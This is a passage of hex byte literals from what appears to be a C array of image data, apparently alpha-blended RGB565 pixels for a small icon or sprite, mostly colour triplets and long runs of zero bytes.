0x36, 0xf7, 0xff, 0x35, 0xf7, 0xff, 0x36, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x57, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0xe6, 0xfe, 0xff, 0xe7, 0xf6, 0xff, 0x10, 0xf7, 0xff, 0x34, 0xf7, 0xff, 0x31, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x35, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0x32, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0xef, 0xf6, 0xff, 0xee, 0xf6, 0xff, 0xeb, 0xf6, 0xff, 0xc4, 0xfe, 0xff, 0xc1, 0xfe, 0xd3, 0xe8, 0xfe, 0x1c, 0xc0, 0xfe, 0x1c, 0xc0, 0xfe, 0x28, 0x60, 0xff, 0x0f, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xbb, 0xde, 0x00, 0xbb, 0xde, 0x0c, 0xdb, 0xde, 0x2b, 0xbb, 0xde, 0x33, 0xfb, 0xde, 0x3b, 0xdb, 0xde, 0x40, 0xdb, 0xde, 0x3b, 0xdb, 0xde, 0x34, 0xdb, 0xde, 0x3f, 0xdb, 0xde, 0x54, 0x1c, 0xe7, 0x74, 0x3a, 0xef, 0xbb, 0x34, 0xf7, 0xff, 0x35, 0xf7, 0xff, 0x36, 0xf7, 0xff, 0x36, 0xf7, 0xff, 0x56, 0xf7, 0xff, 0x33, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0x12, 0xf7, 0xff, 0x13, 0xf7, 0xff, 0x12, 0xf7, 0xff, 0x0f, 0xf7, 0xff, 0xe7, 0xf6, 0xff, 0x04, 0xff, 0xff, 0xe7, 0xf6, 0xff, 0x0f, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0xea, 0xf6, 0xff, 0x0f, 0xf7, 0xff, 0x10, 0xf7, 0xff, 0x0d, 0xf7, 0xff, 0xe8, 0xf6, 0xff, 0xeb, 0xf6, 0xff, 0x33, 0xf7, 0xff, 0x12, 0xf7, 0xff, 0xed, 0xf6, 0xff, 0xec, 0xf6, 0xff, 0xea, 0xf6, 0xff, 0xe9, 0xf6, 0xff, 0xc8, 0xf6, 0xff, 0xc3, 0xfe, 0xff, 0xc1, 0xfe, 0xe7, 0x49, 0xff, 0x18, 0xff, 0xff, 0x03, 0xff, 0xff, 0x00, 0x76, 0xb5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0xe7, 0x00, 0x5d, 0xef, 0x07, 0xba, 0xd6, 0x20, 0xba, 0xd6, 0x30, 0xdb, 0xde, 0x3c, 0xfb, 0xde, 0x50, 0xfb, 0xde, 0x50, 0xdb, 0xde, 0x40, 0xbb, 0xde, 0x38, 0xdb, 0xde, 0x4b, 0x1c, 0xe7, 0x63, 0x12, 0xef, 0xc4, 0xf0, 0xf6, 0xff, 0x11, 0xf7, 0xff, 0x14, 0xf7, 0xf3, 0x12, 0xf7, 0xfc, 0xef, 0xf6, 0xff, 0xed, 0xf6, 0xff, 0xed, 0xf6, 0xff, 0x0f, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0x11, 0xf7, 0xff, 0xee, 0xf6, 0xff, 0xe9, 0xf6, 0xff, 0xe4, 0xfe, 0xff, 0xe4, 0xfe, 0xff, 0xe7, 0xfe, 0xff, 0xe7, 0xf6, 0xff, 0xe5, 0xfe, 0xff, 0xe8, 0xf6, 0xff, 0x0d, 0xf7, 0xff, 0xec, 0xf6, 0xff, 0xe8, 0xf6, 0xff, 0xe6, 0xfe, 0xff, 0xea, 0xf6, 0xff, 0xed, 0xf6, 0xff, 0xe7, 0xf6, 0xff, 0xc5, 0xfe, 0xff, 0xc6, 0xfe, 0xff, 0xc5, 0xfe, 0xf7, 0xc5, 0xfe, 0xe3, 0xc2, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0x23, 0xff, 0x2c, 0xdf, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x79, 0xce, 0x00, 0x39, 0xce, 0x03, 0xdb, 0xde, 0x0f, 0x9a, 0xd6, 0x18, 0xdb, 0xde, 0x23, 0xdb, 0xde, 0x43, 0xdb, 0xde, 0x53, 0xdb, 0xde, 0x4b, 0xdb, 0xde, 0x3c, 0xdb, 0xde, 0x37, 0xdb, 0xde, 0x40, 0xee, 0xf6, 0xa8, 0xf2, 0xee, 0x9f, 0x1b, 0xe7, 0x83, 0x1b, 0xe7, 0xa0, 0xee, 0xf6, 0xf8, 0xc8, 0xf6, 0xff, 0xc7, 0xfe, 0xff, 0xe8, 0xf6, 0xff, 0xeb, 0xf6, 0xff, 0xee, 0xf6, 0xff, 0x0f, 0xf7, 0xff, 0xec, 0xf6, 0xff, 0xea, 0xf6, 0xff, 0xe8, 0xf6, 0xff, 0xe5, 0xfe, 0xff, 0xe4, 0xfe, 0xff, 0xe3, 0xfe, 0xff, 0xe2, 0xfe, 0xff, 0xe4, 0xfe, 0xff, 0xe8, 0xf6, 0xff, 0xea, 0xf6, 0xff, 0xe5, 0xfe, 0xff, 0xe4, 0xfe, 0xff, 0xe4, 0xfe, 0xff, 0xe6, 0xfe, 0xff, 0xc3, 0xfe, 0xff, 0xc2, 0xfe, 0xff, 0xc3, 0xfe, 0xff, 0xc3, 0xfe, 0xf3, 0xdf, 0x76, 0x0f, 0xb0, 0xee, 0x37, 0xc5, 0xfe, 0x7f, 0x03, 0xff, 0x48, 0x00, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfc, 0xe6, 0x03, 0xdb, 0xde, 0x08, 0xfb, 0xde, 0x0b, 0xfb, 0xde, 0x0f, 0xba, 0xd6, 0x28, 0xdb, 0xde, 0x38, 0xdb, 0xde, 0x3c, 0xdb, 0xde, 0x2c, 0xbb, 0xde, 0x1f, 0x7c, 0xce, 0x13, 0xdc, 0xde, 0x28, 0xdb, 0xde, 0x47, 0x19, 0xe7, 0x88, 0xed, 0xf6, 0xfb, 0xc8, 0xf6, 0xff, 0xc4, 0xfe, 0xff, 0xc5, 0xfe, 0xfb, 0xc7, 0xf6, 0xff, 0xea, 0xf6, 0xff, 0xea, 0xf6, 0xff, 0xe9, 0xf6, 0xff, 0xe9, 0xf6, 0xff, 0xe9, 0xf6, 0xff, 0xe7, 0xf6, 0xff, 0xe4, 0xfe, 0xff, 0xe2, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xe2, 0xfe, 0xff, 0xe4, 0xfe, 0xff, 0xc7, 0xfe, 0xff, 0xc5, 0xfe, 0xff, 0xe2, 0xfe, 0xff, 0xc2, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc2, 0xfe, 0xff, 0xc2, 0xfe, 0xff, 0x9f, 0x05, 0x07, 0x9b, 0xd6, 0x0f, 0xde, 0xce, 0x0c, 0xbf, 0xce, 0x04, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x76, 0xb5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xf8, 0xc5, 0x03, 0x39, 0xce, 0x03, 0x79, 0xce, 0x04, 0x39, 0xce, 0x0c, 0x9a, 0xd6, 0x17, 0xfb, 0xde, 0x20, 0xba, 0xd6, 0x0c, 0xfc, 0xe6, 0x07, 0x9a, 0xd6, 0x0b, 0xfb, 0xde, 0x1b, 0xd4, 0xee, 0x60, 0xc7, 0xf6, 0xf4, 0xca, 0xf6, 0xc7, 0xb3, 0xe6, 0x2f, 0xc2, 0xfe, 0xc4, 0xc2, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc4, 0xfe, 0xff, 0xc5, 0xfe, 0xff, 0xe6, 0xfe, 0xff, 0xe8, 0xf6, 0xff, 0xc9, 0xf6, 0xff, 0xe7, 0xfe, 0xff, 0xc3, 0xfe, 0xff, 0xe1, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc2, 0xfe, 0xff, 0xe2, 0xfe, 0xff, 0xc2, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xa4, 0xe2, 0xfe, 0x3b, 0xc0, 0xfe, 0xcc, 0xc1, 0xfe, 0xff, 0xfc, 0x9f, 0x04, 0xff, 0xff, 0x00, 0x38, 0xc6, 0x03, 0xdb, 0xde, 0x07, 0x59, 0xce, 0x03, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0x9e, 0xf7, 0x03, 0xff, 0xff, 0x03, 0x59, 0xce, 0x04, 0xbb, 0xde, 0x07, 0x9a, 0xd6, 0x04, 0xd7, 0xbd, 0x04, 0x5d, 0xef, 0x03, 0xdb, 0xde, 0x08, 0xd4, 0xee, 0x1f, 0xae, 0xee, 0x38, 0xbb, 0xd6, 0x24, 0xdf, 0xd6, 0x1f, 0xe2, 0xfe, 0xa3, 0xc1, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc1, 0xfe, 0x8b, 0xc1, 0xfe, 0xff, 0xc2, 0xfe, 0xff, 0xc3, 0xfe, 0xff, 0xc4, 0xfe, 0xff, 0xc5, 0xfe, 0xff, 0xc4, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc1, 0xfe, 0xec, 0xc1, 0xfe, 0xac, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xe1, 0xfe, 0x7b, 0xa0, 0xfe, 0x00, 0xab, 0xfe, 0x00, 0xc3, 0xfe, 0x37, 0x49, 0xff, 0x08, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x1c, 0xe7, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x76, 0xb5, 0x00, 0x96, 0xb5, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0x7a, 0xd6, 0x03, 0x59, 0xce, 0x04, 0x3c, 0xe7, 0x03, 0x9e, 0xf7, 0x03, 0x7a, 0xd6, 0x04, 0xbb, 0xd6, 0x04, 0x1d, 0xe7, 0x07, 0xba, 0xd6, 0x0c, 0xbd, 0xd6, 0x1c, 0xe8, 0xf6, 0x83, 0xc1, 0xfe, 0xf0, 0xc4, 0xfe, 0x43, 0x80, 0xfe, 0x00, 0xc0, 0xfe, 0xef, 0xc1, 0xfe, 0xff, 0xc1, 0xfe, 0xeb, 0xc3, 0xfe, 0x73, 0xc1, 0xfe, 0xff, 0xc1, 0xfe, 0xff, 0xc2, 0xfe, 0xec, 0xc1, 0xfe, 0x78, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xff, 0xc0, 0xfe, 0xc8, 0xe0, 0xfe, 0x00, 0xc1, 0xfe, 0x5f, 0xc0, 0xfe, 0xff, 0x01, 0xff, 0x50, 0xe0, 0xfe, 0x00, 0x80, 0xfd, 0x00, 0xeb, 0xfe, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x76, 0xb5, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0x7e, 0xf7, 0x03, 0x18, 0xc6, 0x04, 0xff, 0xff, 0x03, 0xbf, 0xff, 0x03, 0x39, 0xce, 0x04, 0xfc, 0xe6, 0x03, 0x3d, 0xef, 0x03, 0x5c, 0xc6, 0x04, 0xcc, 0xf6, 0x2b, 0xcf, 0xf6, 0x28, 0x5f, 0x05, 0x00, 0xc0, 0xfe, 0x00, 0xe0, 0xfe, 0x7b, 0xc0, 0xfe, 0xff, 0xc3, 0xfe, 0x33, 0xc0, 0xfe, 0x00, 0xc0, 0xfe, 0xa7, 0xc0, 0xfe, 0xff, 0xc2, 0xfe, 0x8c, 0x80, 0xfe, 0x00, 0xc0, 0xfe, 0x5b, 0xc0, 0xfe, 0xff, 0xe0, 0xfe, 0x60, 0x20, 0xfe, 0x00, 0xa0, 0xfd, 0x00, 0xc0, 0xfe, 0x2c, 0x40, 0xff, 0x1b, 0x22, 0xff, 0x00, 0x00, 0x00, 0x00, 0x76, 0xb5, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x76, 0xb5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0xff, 0xff, 0x00, 0x3c, 0xe7, 0x03, 0xdf, 0xff, 0x03, 0x1c, 0xbe, 0x04, 0x3d, 0xe7, 0x08, 0x18, 0xc6, 0x03, 0xff, 0xff, 0x00, 0xe3, 0xfe, 0x27, 0xc1, 0xfe, 0x44, 0x60, 0xfe, 0x00, 0x9b, 0xff, 0x00, 0xe0, 0xfe, 0x1f, 0xc0, 0xfe, 0xdf, 0x20, 0xfe, 0x00, 0xff, 0xff, 0x00, 0x60, 0xfe, 0x00, 0xc0, 0xfe, 0x9f, 0xe1, 0xff, 0x00, 0x4d, 0xff, 0x00, 0xff, 0xff, 0x00, 0x80, 0xfe, 0x00, 0x40, 0xff, 0x00, 0x40, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x76, 0xb5, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x5d, 0xef, 0x03, 0x7d, 0xef, 0x03, 0x7e, 0xf7, 0x03, 0xff, 0xff, 0x00, 0xf9, 0xff, 0x00, 0x40, 0xfe, 0x00, 0xfe, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0xff, 0x00, 0xc0, 0xfe, 0x13, 0xe1, 0xfe, 0x00, 0xff, 0xff, 0x00, 0x2c, 0xff, 0x00, 0xe4, 0xff, 0x00, 0x40, 0xff, 0x00, 0x20, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x03, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x4d, 0x6b, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 